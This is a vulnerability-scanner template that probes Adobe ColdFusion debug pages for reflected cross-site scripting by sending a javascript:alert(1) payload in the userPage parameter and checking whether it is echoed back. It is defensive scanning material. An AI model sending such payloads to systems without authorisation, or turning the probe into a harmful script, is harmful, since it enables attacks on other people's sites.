id: coldfusion-debug-xss
info:
  name: Adobe ColdFusion Debug Page XSS
  risk: Medium

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      /CFIDE/
      /cfusion/

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}debug/cf_debugFr.cfm?userPage=javascript:alert(1)
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', '"cf_main_cf" src="javascript:alert(1)"')
